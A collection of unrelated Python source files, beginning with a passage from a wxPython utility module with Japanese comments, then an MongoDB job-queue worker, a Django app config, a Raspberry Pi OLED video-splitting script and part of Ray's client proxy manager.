# 書き込みテスト FIXME: 書き込みに頼らないスマートな方法
self.WriteText(value)
value2 = value
except Exception:
value2 = cw.util.decode_text(value)
# FIXME: URLクリック等でキャレットがURL上にある場合に
# テキストを削除すると、URLリンク設定が以降追加された
# 全テキストに適用される。
# そのため、末尾がURLではない事を前提に、キャレットを
# テキスト末尾へ移動してからクリアを行う。
self.MoveEnd()
self.Clear()
# URLを検索して取り出し、テキストをリストに分割
def get_urls(text):
prog = re.compile(r"http(s)?://([\w\-]+\.)+[\w]+(/[\w\-./?%&=~#!]*)?")
list = []
url = prog.search(text)
while url:
if url.start() > 0:
list.append((text[:url.start()], False))
list.append((url.group(0), True))
text = text[url.end():]
url = prog.search(text)
if len(text) > 0:
list.append((text, False))
return list
if linkurl:
for v, url_flag in get_urls(value2):
if url_flag:
self.BeginTextColour((255, 132, 0))
self.BeginUnderline()
self.BeginURL(v)
else:
self.BeginTextColour(wx.WHITE)
self.WriteText(v)
if url_flag:
self.EndURL()
self.EndUnderline()
self.EndTextColour()
self.EndTextColour()
if len(self.GetValue()) and not self.GetValue()[-1] in ("\n", "\r"):
# 末尾が改行でない時は改行を加える
# 前記した全文URL化バグへの対策でもある
self.WriteText("\n")
self.ShowPosition(0)
def OnMouseWheel(self, event):
if has_modalchild(self):
return
y = self.GetScrollPos(wx.VERTICAL)
if sys.platform == "win32":
import win32gui
SPI_GETDESKWALLPAPER = 104
value = win32gui.SystemParametersInfo(SPI_GETDESKWALLPAPER)
line_height = self.GetFont().GetPixelSize()[1]
value *= line_height
value /= self.GetScrollPixelsPerUnit()[1]
else:
value = cw.wins(4)
if get_wheelrotation(event) > 0:
self.Scroll(0, y - value)
else:
self.Scroll(0, y + value)
self.Refresh()
def OnMotion(self, event):
# 画面外へのドラッグによるスクロール処理だが、マウス入力の分岐は不要?
mousey = event.GetPosition()[1]
y = self.GetScrollPos(wx.VERTICAL)
if mousey < cw.wins(0):
self.Scroll(0, y - cw.wins(4))
self.Refresh()
elif mousey > self.GetSize()[1]:
self.Scroll(0, y + cw.wins(4))
self.Refresh()
event.Skip()
def OnContextMenu(self, event):
self.mi_copy.Enable(self.HasSelection())
for searchengine in self.search_engines:
searchengine.mi.Enable(self.HasSelection())
self.PopupMenu(self.popup_menu)
def OnCopy(self, event):
self.Copy()
def OnSelectAll(self, event):
self.SelectAll()
def go_url(self, url):
try:
webbrowser.open(url)
except:
s = u"「%s」が開けませんでした。インターネットブラウザが正常に関連付けされているか確認して下さい。" % url
dlg = cw.dialog.message.ErrorMessage(self, s)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def OnURL(self, event):
# 文字列選択中はブラウザ起動しない
if not self.HasSelection():
self.go_url(event.GetString())
def get_wheelrotation(event):
"""マウスのホイールを横に倒した場合に
取得できる回転量の値は直感と逆転しているので
この関数をラッパとして反転した値を取得する。
"""
if 3 <= wx.VERSION[0] and event.GetWheelAxis() == wx.MOUSE_WHEEL_HORIZONTAL:
return -event.GetWheelRotation()
else:
return event.GetWheelRotation()
class CWTabArt(wx.lib.agw.aui.tabart.AuiDefaultTabArt):
"""wx.lib.agw.aui.tabart.AuiDefaultTabArtと同じように
wx.lib.agw.aui.AuiNotebookのタブを描画するが、
テキストのみ左寄せから中央寄せに変更する。
"""
def DrawTab(self, dc, wnd, page, in_rect, close_button_state, paint_control=False):
# テキストを一旦空にして背景だけ描画させる
caption = page.caption
page.caption = u""
r = super(CWTabArt, self).DrawTab(dc, wnd, page, in_rect, close_button_state, paint_control)
page.caption = caption
# テキストを描画
te = dc.GetTextExtent(page.caption)
rect = r[0]
dc.DrawText(page.caption, rect.X + (rect.Width - te[0]) / 2, in_rect.Y + (in_rect.Height - te[1]) / 2)
return r
#-------------------------------------------------------------------------------
# スレッド関係
#-------------------------------------------------------------------------------
"""
@synclock(_lock)
def function():
...
のように、ロックオブジェクトを指定して
特定関数・メソッドの排他制御を行う。
"""
def synclock(l):
def synclock(f):
def acquire(*args, **kw):
l.acquire()
try:
return f(*args, **kw)
finally:
l.release()
return acquire
return synclock
#-------------------------------------------------------------------------------
# ショートカット関係
#-------------------------------------------------------------------------------
# CoInitialize()を呼び出し終えたスレッドのset
_cominit_table = set()
def _co_initialize():
"""スレッドごとにCoInitialize()を呼び出す。"""
global _cominit_table
if sys.platform <> "win32":
return
thr = threading.currentThread()
if thr in _cominit_table:
return # 呼び出し済み
pythoncom.CoInitialize()
_cominit_table.add(thr)
# 終了したスレッドがあれば除去
for thr2 in _cominit_table.copy():
if not thr2.isAlive():
_cominit_table.remove(thr2)
def get_linktarget(fpath):
"""fileがショートカットだった場合はリンク先を、
そうでない場合はfileを返す。
"""
if sys.platform <> "win32" or not fpath.lower().endswith(".lnk") or not os.path.isfile(fpath):
return fpath
_co_initialize()
shortcut = pythoncom.CoCreateInstance(win32shell.CLSID_ShellLink, None,
pythoncom.CLSCTX_INPROC_SERVER,
win32shell.IID_IShellLink)
try:
encoding = sys.getfilesystemencoding()
STGM_READ = 0x00000000
shortcut.QueryInterface(pythoncom.IID_IPersistFile).Load(fpath.encode(encoding), STGM_READ)
fpath = shortcut.GetPath(win32shell.SLGP_UNCPRIORITY)[0].decode(encoding)
except Exception:
print_ex()
return fpath
return get_linktarget(join_paths(fpath))
def create_link(shortcutpath, targetpath):
"""targetpathへのショートカットを
shortcutpathに作成する。
"""
if sys.platform <> "win32":
return
dpath = os.path.dirname(shortcutpath)
if not os.path.exists(dpath):
os.makedirs(dpath)
_co_initialize()
targetpath = os.path.abspath(targetpath)
shortcut = pythoncom.CoCreateInstance(win32shell.CLSID_ShellLink, None,
pythoncom.CLSCTX_INPROC_SERVER,
win32shell.IID_IShellLink)
encoding = sys.getfilesystemencoding()
shortcut.SetPath(targetpath.encode(encoding))
shortcut.QueryInterface(pythoncom.IID_IPersistFile).Save(shortcutpath.encode(encoding), 0)
#-------------------------------------------------------------------------------
# パフォーマンスカウンタ
#-------------------------------------------------------------------------------
dictimes = {}
times = [0.0] * 1024
timer = 0.0
def t_start():
global timer
timer = time.time()
def t_end(index):
global times, timer
times[index] += time.time() - timer
timer = time.time()
def td_end(key):
global dictimes, timer
if key in dictimes:
dictimes[key] += time.time() - timer
else:
dictimes[key] = time.time() - timer
timer = time.time()
def t_reset():
global times, dictimes
times = map(lambda v: 0, times)
dictimes.clear()
def t_print():
global times, dictimes
lines = []
for i, t in enumerate(times):
if 0 < t:
s = u"time[%s] = %s" % (i, t)
lines.append(s)
print s
for key, t in dictimes.iteritems():
if 0 < t:
s = u"time[%s] = %s" % (key, t)
lines.append(s)
print s
if lines:
with open("performance.txt", "w") as f:
f.write(u"\n".join(lines))
f.flush()
f.close()
#-------------------------------------------------------------------------------
# 同時起動制御
#-------------------------------------------------------------------------------
_lock_mutex = threading.Lock()
_mutex = []
if sys.platform <> "win32":
import fcntl
@synclock(_lock_mutex)
def create_mutex(dpath):
global _mutex
if not os.path.isabs(dpath):
dpath = os.path.abspath(dpath)
dpath = os.path.normpath(dpath)
dpath = os.path.normcase(dpath)
name = os.path.join(dpath, u".CardWirthPy.lock")
# 二重起動防止 for Windows
if sys.platform == "win32":
# BUG: win32file.LockFileEx()とwin32file.UnlockFileEx()を使うと、
# なぜかこの関数を抜けた後でロック解除がうまくいかなくなる
kernel32 = ctypes.windll.kernel32
class OVERLAPPED(ctypes.Structure):
_fields_ = [
('Internal', ctypes.wintypes.DWORD),
('InternalHigh', ctypes.wintypes.DWORD),
('Offset', ctypes.wintypes.DWORD),
('OffsetHigh', ctypes.wintypes.DWORD),
('hEvent', ctypes.wintypes.HANDLE),
]
f = open(name, "w")
handle = msvcrt.get_osfhandle(f.fileno())
if kernel32.LockFileEx(handle,
win32con.LOCKFILE_FAIL_IMMEDIATELY|win32con.LOCKFILE_EXCLUSIVE_LOCK,
0, 0, 0xffff0000, ctypes.byref(OVERLAPPED())):
class Unlock(object):
def __init__(self, name, f):
self.name = name
self.f = f
def unlock(self):
if self.f:
handle = msvcrt.get_osfhandle(self.f.fileno())
kernel32.UnlockFileEx(handle, 0, 0, 0xffff0000, ctypes.byref(OVERLAPPED()))
self.f = None
remove(self.name)
_mutex.append((Unlock(name, f), name))
return True
else:
return False
else:
# Posix
try:
if not os.path.isfile(name):
dpath = os.path.dirname(name)
if not os.path.isdir(dpath):
os.makedirs(dpath)
f = open(name, "wb")
fcntl.flock(f.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
_mutex.append((f, name))
return True
except IOError:
return False
return False
@synclock(_lock_mutex)
def exists_mutex(dpath):
global _mutex
if not os.path.isabs(dpath):
dpath = os.path.abspath(dpath)
dpath = os.path.normpath(dpath)
dpath = os.path.normcase(dpath)
name = os.path.join(dpath, u".CardWirthPy.lock")
if name in map(lambda m: m[1], _mutex):
return False
if sys.platform == "win32":
try:
if not os.path.isfile(name):
return False
with open(name, "w") as f:
pass
remove(name)
except:
return True
return False
else:
# Posix
try:
if not os.path.isfile(name):
dpath = os.path.dirname(name)
if not os.path.isdir(dpath):
os.makedirs(dpath)
with open(name, "wb") as f:
fcntl.flock(f.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
fcntl.flock(f.fileno(), fcntl.LOCK_UN)
f.close()
remove(name)
return False
except IOError:
return True
@synclock(_lock_mutex)
def release_mutex(index=-1):
global _mutex
if _mutex:
if sys.platform == "win32":
_mutex[index][0].unlock()
else:
fcntl.flock(_mutex[index][0].fileno(), fcntl.LOCK_UN)
_mutex[index][0].close()
remove(_mutex[index][1])
_mutex.pop(index)
@synclock(_lock_mutex)
def clear_mutex():
global _mutex
for mutex, name in _mutex:
if sys.platform == "win32":
mutex.unlock()
else:
f = mutex
fcntl.flock(f.fileno(), fcntl.LOCK_UN)
f.close()
remove(name)
_mutex = []
def main():
pass
if __name__ == "__main__":
main()
|
worker.py
|
from contextlib import contextmanager
from datetime import datetime
import getpass
import logging
from multiprocessing import Process
import os
import platform
import signal
import sys
import time
import random
from pymongo.errors import ConnectionFailure
from mtq.log import MongoStream, MongoHandler
from mtq.utils import handle_signals, now, setup_logging, nulltime
class Worker(object):
'''
Should create a worker from MTQConnection.new_worker.
'''
def __init__(self, factory, queues=(), tags=(), priority=0,
poll_interval=1, exception_handler=None,
log_worker_output=False, silence=False, extra_lognames=()):
self.name = '%s.%s' % (platform.node(), os.getpid())
self.extra_lognames = extra_lognames
self.queues = queues
self.tags = tags
self.priority = priority
self._log_worker_output = log_worker_output
self.factory = factory
self.poll_interval = poll_interval
self.logger = logging.getLogger('mq.Worker')
self._current = None
self._handler = exception_handler
self._pre_call = None
self._post_call = None
self.silence = silence
self.collection = self.factory.worker_collection
worker_id = '-'
@contextmanager
def register(self):
'''
Internal
Contextmanager, register the birth and death of this worker
eg::
with worker.register():
# Work
'''
self.collection = self.factory.worker_collection
self.worker_id = self.collection.insert({'name': self.name,
'host': platform.node(),
'system': platform.system(),
'pid': os.getgid(),
'user': getpass.getuser(),
'started':now(),
'finished':datetime.fromtimestamp(0),
'check-in':datetime.fromtimestamp(0),
'working':True,
'queues': self.queues,
'tags': self.tags,
'log_output': bool(self._log_worker_output),
'terminate': False,
'terminate_status': 0,
})
if self._log_worker_output:
hdlr = MongoHandler(self.factory.logging_collection, {'worker_id':self.worker_id})
self.logger.addHandler(hdlr)
try:
yield self.worker_id
finally:
if self._log_worker_output:
self.logger.removeHandler(hdlr)
query = {'_id': self.worker_id}
update = {'$set':{'finished':now(), 'working':False}}
self.collection.update(query, update)
def check_in(self):
query = {'_id': self.worker_id}
update = {'$set':{'check-in':now(), 'working':True}}
worker_info = self.collection.find_and_modify(query, update)
if worker_info:
should_exit = worker_info.get('terminate', False)
status = worker_info.get('terminate_status', 0)
return should_exit, status
return False, 0
def work(self, one=False, batch=False, failed=False, fail_fast=False):
'''
Main work function
:param one: wait for the first job execute and then exit
:param batch: work until the queue is empty, then exit
'''
with self.register():
try:
self.start_main_loop(one, batch, failed, fail_fast)
except KeyboardInterrupt:
self.logger.exception(None)
if not self._current:
return
self.logger.warn('Warm shutdown requested')
proc, job = self._current
proc.join(timeout=job.doc.get('timeout'))
return
def pop_item(self, pop_failed=False):
job = self.factory.pop_item(worker_id=self.worker_id,
queues=self.queues,
tags=self.tags,
failed=pop_failed,
)
return job
def start_main_loop(self, one=False, batch=False, pop_failed=False, fail_fast=False, max_retries=10):
'''
Start the main loop and process jobs
'''
self.logger.info('Starting Main Loop mongo-host=%s mongo-db=%s' % (self.factory.db.connection.host,
self.factory.db.name))
self.logger.info('Starting Main Loop worker=%s _id=%s' % (self.name, self.worker_id))
self.logger.info('Listening for jobs queues=[%s] tags=[%s]' % (', '.join(self.queues), ', '.join(self.tags)))
retries = 0
while 1:
try:
should_exit, status = self.check_in()
if should_exit:
self.logger.info("Shutdown Requested (from DB)")
raise SystemExit(status)
job = self.pop_item(pop_failed=pop_failed)
if job is None:
if batch: break
time.sleep(self.poll_interval)
continue
self.process_job(job)
if one: break
self.logger.info('Listening for jobs queues=[%s] tags=[%s]' % (', '.join(self.queues), ', '.join(self.tags)))
retries = 0
# Handle connection errors
except ConnectionFailure as err:
if fail_fast:
raise
elif (retries == max_retries):
self.logger.exception('Retry limit reached (%d)', max_retries)
raise
elif retries < max_retries:
retries += 1
self.logger.exception(err)
sleep_time = ((2 ** retries) + random.random()) * 0.1
self.logger.warn('Retrying in %.2f seconds', sleep_time)
time.sleep(sleep_time)
else:
self.logger.exception(err)
if one:
break
except Exception as err:
if fail_fast:
raise
else:
self.logger.exception(err)
if one:
break
self.logger.info('Exiting Main Loop')
def process_job(self, job):
'''
Process a single job in a multiprocessing.Process
'''
self.logger.info('Popped Job _id=%s queue=%s tags=%s' % (job.id, job.qname, ', '.join(job.tags)))
self.logger.info(job.call_str)
proc = Process(target=self._process_job, args=(job,))
self._current = proc, job
proc.start()
timeout = job.doc.get('timeout')
if timeout:
self.logger.info("Job started, timing out after %s seconds" % timeout)
else:
self.logger.info("Job started, no time out")
proc.join(timeout=job.doc.get('timeout'))
if proc.is_alive():
self.logger.error('Timeout occurred: interrupting job')
os.kill(proc.pid, signal.SIGALRM)
# Give the process 2 min to finish
proc.join(timeout=min(job.doc.get('timeout'), 2 * 60))
if proc.is_alive():
self.logger.error('Process did not shut down after interrupt: terminating job')
proc.terminate()
self._current = None
failed = proc.exitcode != 0
if failed:
self.logger.error('Job %s failed' % (job.doc['_id']))
else:
self.logger.info('Job %s finished successfully' % (job.doc['_id']))
job.set_finished(failed)
return failed
def _process_job(self, job):
'''
'''
handle_signals()
with setup_logging(self.factory.logging_collection, job.id):
try:
self._pre(job)
job.apply()
except:
if self._handler:
exc_type, exc_value, traceback = sys.exc_info()
self._handler(job, exc_type, exc_value, traceback)
raise
finally:
self._post(job)
def _pre(self, job):
if self._pre_call: self._pre_call(job)
def _post(self, job):
if self._post_call: self._post_call(job)
def set_pre(self, func):
self._pre_call = func
def set_post(self, func):
self._post_call = func
def push_exception_handler(self, handler):
self._handler = handler
@property
def num_backlog(self):
'number of tasks this worker has to complete'
return self.factory._items_cursor(queues=self.queues,
tags=self.tags,
).count()
class WorkerProxy(object):
'This is a representation of an actual worker process'
def __init__(self, factory, doc):
self.factory = factory
self.doc = doc
@property
def id(self):
return self.doc['_id']
@property
def name(self):
return self.doc['name']
@property
def qnames(self):
return self.doc.get('queues', ())
@property
def tags(self):
return self.doc['tags']
@property
def num_processed(self):
'number of tasks this worker has completed'
collection = self.factory.queue_collection
return collection.find({'worker_id': self.id}).count()
@property
def num_backlog(self):
'number of tasks this worker has to complete'
return self.factory._items_cursor(queues=self.qnames,
tags=self.tags,
).count()
@property
def last_check_in(self):
'last check in time'
return self.doc.get('check-in', nulltime())
def stream(self):
collection = self.factory.logging_collection
return MongoStream(collection,
doc={'worker_id': self.id},
finished=self.finished)
def finished(self):
'test if this worker is finished'
coll = self.factory.worker_collection
cursor = coll.find({'_id': self.id, 'working': False})
return bool(cursor.count())
|
config.py
|
import sys
import webbrowser
from os.path import exists, join
from shutil import copyfile, copytree
from threading import Thread
from time import sleep
from django.apps import AppConfig
from django.conf import settings
from requests import get as requests_get
class PyplanAppConfig(AppConfig):
name = 'pyplan.pyplan'
verbose_name = "Pyplan API"
def ready(self):
# TODO: if desktop_mode ?
try:
from django.contrib.sessions.models import Session
Session.objects.all().delete()
except:
pass
print('Pyplan is ready')
try:
# Check if the user has demo models
examples_folder = join(settings.MEDIA_ROOT, 'models', 'Examples')
if not exists(examples_folder):
copytree(join(settings.BACKEND_DIR, 'demos', 'Examples'),
examples_folder)
tutorials_folder = join(settings.MEDIA_ROOT, 'models', 'Tutorials')
if not exists(tutorials_folder):
copytree(join(settings.BACKEND_DIR, 'demos', 'Tutorials'),
tutorials_folder)
home_file = join(settings.MEDIA_ROOT, 'models', 'home.json')
if not exists(home_file):
copyfile(join(settings.BACKEND_DIR, 'demos', 'home.json'),
home_file)
except Exception as ex:
print(ex)
try:
port = str(sys.argv[1])
def _wait_for_ready(retries):
response = None
try:
response = requests_get(
f'http://localhost:{port}/api/healthcheck/')
except:
pass
finally:
if not response is None and response.status_code == 200:
webbrowser.open(f'http://localhost:{port}', new=2)
else:
if retries < 40:
sleep(1)
_wait_for_ready(retries+1)
else:
print("Open the browser and go to http://localhost:9740")
waiter = Thread(target=_wait_for_ready, args=(1,))
waiter.start()
except Exception as ex:
print(ex)
print("Open the browser and go to http://localhost:9740")
|
display_Run.py
|
import cv2
import _thread
import time
import multiprocessing as mp
from luma.core.interface.serial import i2c
from luma.core.render import canvas
from luma.oled.device import ssd1306, ssd1325, ssd1331, sh1106
from time import sleep
from PIL import Image
cap= cv2.VideoCapture('/home/pi/Downloads/videoplayback.mp4')
n_rows = 3
n_images_per_row = 3
width = 384
height = 192
dim = (width, height)
serial9 = i2c(port=11, address=0x3C)
device9 = ssd1306(serial9)
serial8 = i2c(port=10, address=0x3C)
device8 = ssd1306(serial8)
serial7 = i2c(port=9, address=0x3C)
device7 = ssd1306(serial7)
serial6 = i2c(port=8, address=0x3C)
device6 = ssd1306(serial6)
serial5 = i2c(port=7, address=0x3C)
device5 = ssd1306(serial5)
serial4 = i2c(port=6, address=0x3C)
device4 = ssd1306(serial4)
serial3 = i2c(port=5, address=0x3C)
device3 = ssd1306(serial3)
serial2 = i2c(port=4, address=0x3C)
device2 = ssd1306(serial2)
serial1 = i2c(port=3, address=0x3C)
device1 = ssd1306(serial1)
def print_Image(image,device):
device.display(image)
#print("print image1")
def print_Image2(image,device):
device.display(image)
#print("print image2")
def print_Image3(image,device):
device.display(image)
#print("print image3")
def print_Image4(image,device):
device.display(image)
#print("print image4")
def print_Image5(image,device):
device.display(image)
def print_Image6(image,device):
device.display(image)
def print_Image7(image,device):
device.display(image)
def print_Image8(image,device):
device.display(image)
def print_Image9(image,device):
device.display(image)
'''def process_1(image,device4,image2,device3):
print("Process1_called")
#device4.display(image)
#device3.display(image2)
_thread.start_new_thread(print_Image, (image,device4),)
_thread.start_new_thread(print_Image2, (image2,device3),)
def process_2(image3,device2,image4,device1):
print("Process2_called")
#device2.display(image3)
#device1.display(image4)
_thread.start_new_thread(print_Image3, (image3,device2),)
_thread.start_new_thread(print_Image4, (image4,device1),)
'''
while(True):
start_time = time.time()
ret, frame = cap.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)
height, width = frame.shape
roi_height = int(height / n_rows)
roi_width = int(width / n_images_per_row)
images = []
for x in range(0, n_rows):
for y in range(0, n_images_per_row):
tmp_image=frame[x*roi_height:(x+1)*roi_height, y*roi_width:(y+1)*roi_width]
images.append(tmp_image)
#Display image
for x in range(0, n_rows):
for y in range(0, n_images_per_row):
cv2.imshow(str(x*n_images_per_row+y+1),images[x*n_images_per_row+y])
cv2.moveWindow(str(x*n_images_per_row+y+1), 100+(y*roi_width), 50+(x*roi_height))
#image = Image.fromarray(images[0]).convert('1')
#image2 = Image.fromarray(images[1]).convert('1')
#image3 = Image.fromarray(images[2]).convert('1')
#image4 = Image.fromarray(images[3]).convert('1')
#time.sleep(.01)
#a=mp.Process(target=process_1, args=(image,image2,device4,device3,))
#b=mp.Process(target=process_2, args=(image3,image4,device2,device1,))
#time.sleep(.052)
#_thread.start_new_thread(print_Image, (image,device4),)
#_thread.start_new_thread(print_Image2, (image2,device3),)
#_thread.start_new_thread(print_Image3, (image3,device2),)
#_thread.start_new_thread(print_Image4, (image4,device1),)
#a.start()
#a.join()
#b.start()
#b.join()
image = Image.fromarray(images[0]).convert('1')
image2 = Image.fromarray(images[1]).convert('1')
image3 = Image.fromarray(images[2]).convert('1')
image4 = Image.fromarray(images[3]).convert('1')
image5 = Image.fromarray(images[4]).convert('1')
image6 = Image.fromarray(images[5]).convert('1')
image7 = Image.fromarray(images[6]).convert('1')
image8 = Image.fromarray(images[7]).convert('1')
image9 = Image.fromarray(images[8]).convert('1')
time.sleep(.155)
_thread.start_new_thread(print_Image, (image,device9),)
_thread.start_new_thread(print_Image2, (image2,device8),)
_thread.start_new_thread(print_Image3, (image3,device7),)
_thread.start_new_thread(print_Image4, (image4,device6),)
_thread.start_new_thread(print_Image5, (image5,device5),)
_thread.start_new_thread(print_Image6, (image6,device4),)
_thread.start_new_thread(print_Image7, (image7,device3),)
_thread.start_new_thread(print_Image8, (image8,device2),)
_thread.start_new_thread(print_Image9, (image9,device1),)
'''
a=mp.Process(target=process_1, args=(image,image2,device4,device3,))
b=mp.Process(target=process_2, args=(image3,image4,device2,device1,))
a.start()
b.start()'''
if cv2.waitKey(1) & 0xFF == ord('q'):
break
print(time.time()-start_time)
cap.release()
cv2.destroyAllWindows()
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import socket
import sys
from threading import Event, Lock, Thread, RLock
import time
import traceback
from typing import Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
import ray.core.generated.agent_manager_pb2 as agent_manager_pb2
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
import ray.core.generated.runtime_env_agent_pb2 as runtime_env_agent_pb2
import ray.core.generated.runtime_env_agent_pb2_grpc as runtime_env_agent_pb2_grpc # noqa: E501
from ray.util.client.common import (
_get_client_id_from_context,
ClientServerHandle,
CLIENT_SERVER_MAX_THREADS,
GRPC_OPTIONS,
_propagate_error_in_context,
)
from ray.util.client.server.dataservicer import _get_reconnecting_from_context
from ray._private.client_mode_hook import disable_client_hook
from ray._private.parameter import RayParams
from ray._private.runtime_env.context import RuntimeEnvContext
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.tls_utils import add_port_to_grpc_server
from ray._private.gcs_utils import GcsClient, use_gcs_for_bootstrap
from ray._private.utils import detect_fate_sharing_support
# Import psutil after ray so the packaged version is used.
import psutil
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 30
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
@dataclass
class SpecificServer:
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def is_ready(self) -> bool:
"""Check if the server is ready or not (doesn't block)."""
return self.process_handle_future.done()
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
# This is only set to none when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.is_ready():
self.process_handle_future.set_result(proc)
def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
This works by ensuring that the the first three arguments are similar to:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
class ProxyManager:
def __init__(
self,
address: Optional[str],
*,
session_dir: Optional[str] = None,
redis_password: Optional[str] = None,
runtime_env_agent_port: int = 0,
):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self._address = address
self._redis_password = redis_password
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT)
)
self._runtime_env_channel = ray._private.utils.init_grpc_channel(
f"127.0.0.1:{runtime_env_agent_port}"
)
self._runtime_env_stub = (
runtime_env_agent_pb2_grpc.RuntimeEnvServiceStub( # noqa: E501
self._runtime_env_channel
)
)
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._node: Optional[ray.node.Node] = None
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
raise RuntimeError("Unable to succeed in selecting a random port.")
@property
def address(self) -> str:
"""
Returns the provided Ray bootstrap address, or creates a new cluster.
"""
if self._address:
return self._address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self._address = connection_tuple["address"]
self._session_dir = connection_tuple["session_dir"]
return self._address
@property
def node(self) -> ray.node.Node:
"""Gets a 'ray.Node' object for this node (the head node).
If it does not already exist, one is created using the bootstrap
address.
"""
if self._node:
return self._node
if use_gcs_for_bootstrap():
ray_params = RayParams(gcs_address=self.address)
else:
ray_params = RayParams(redis_address=self.address)
if self._redis_password:
ray_params.redis_password = self._redis_password
self._node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True,
)
return self._node
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
Create, but not start a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert (
self.servers.get(client_id) is None
), f"Server already created for Client: {client_id}"
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=ray._private.utils.init_grpc_channel(
f"127.0.0.1:{port}", options=GRPC_OPTIONS
),
)
self.servers[client_id] = server
return server
def _create_runtime_env(
self, serialized_runtime_env: str, specific_server: SpecificServer
):
"""Creates the runtime_env by sending an RPC to the agent.
Includes retry logic to handle the case when the agent is
temporarily unreachable (e.g., hasn't been started up yet).
"""
create_env_request = runtime_env_agent_pb2.CreateRuntimeEnvRequest(
serialized_runtime_env=serialized_runtime_env,
job_id=f"ray_client_server_{specific_server.port}".encode("utf-8"),
)
retries = 0
max_retries = 5
wait_time_s = 0.5
while retries <= max_retries:
try:
r = self._runtime_env_stub.CreateRuntimeEnv(create_env_request)
if r.status == agent_manager_pb2.AgentRpcStatus.AGENT_RPC_STATUS_OK:
return r.serialized_runtime_env_context
elif (
r.status == agent_manager_pb2.AgentRpcStatus.AGENT_RPC_STATUS_FAILED
):
raise RuntimeError(
"Failed to create runtime_env for Ray client "
f"server, it is caused by:\n{r.error_message}"
)
else:
assert False, f"Unknown status: {r.status}."
except grpc.RpcError as e:
# Whitelist of errors we consider transient.
# NOTE(edoakes): we can get UNIMPLEMENTED while the server
# starts up because the agent runs multiple gRPC services
# on the same port.
if e.code() not in [
grpc.StatusCode.UNAVAILABLE,
grpc.StatusCode.UNIMPLEMENTED,
]:
raise e
logger.warning(
f"CreateRuntimeEnv request failed: {e}. "
f"Retrying after {wait_time_s}s. "
f"{max_retries-retries} retries remaining."
)
# Exponential backoff.
time.sleep(wait_time_s)
retries += 1
wait_time_s *= 2
raise TimeoutError(
f"CreateRuntimeEnv request failed after {max_retries} attempts."
)
def start_specific_server(self, client_id: str, job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
output, error = self.node.get_log_file_handles(
f"ray_client_server_{specific_server.port}", unique=True
)
serialized_runtime_env = job_config.get_serialized_runtime_env()
if not serialized_runtime_env or serialized_runtime_env == "{}":
# TODO(edoakes): can we just remove this case and always send it
# to the agent?
serialized_runtime_env_context = RuntimeEnvContext().serialize()
else:
serialized_runtime_env_context = self._create_runtime_env(
serialized_runtime_env=serialized_runtime_env,
specific_server=specific_server,
)
proc = start_ray_client_server(
self.address,
self.node.node_ip_address,
specific_server.port,
stdout_file=output,
stderr_file=error,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env_context=serialized_runtime_env_context,
redis_password=self._redis_password,
)
# Wait for the process being run transitions from the shim process
# to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
else:
psutil_proc = None
# Don't use `psutil` on Win32
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug("Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(
f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}"
)
return proc.process.poll() is None
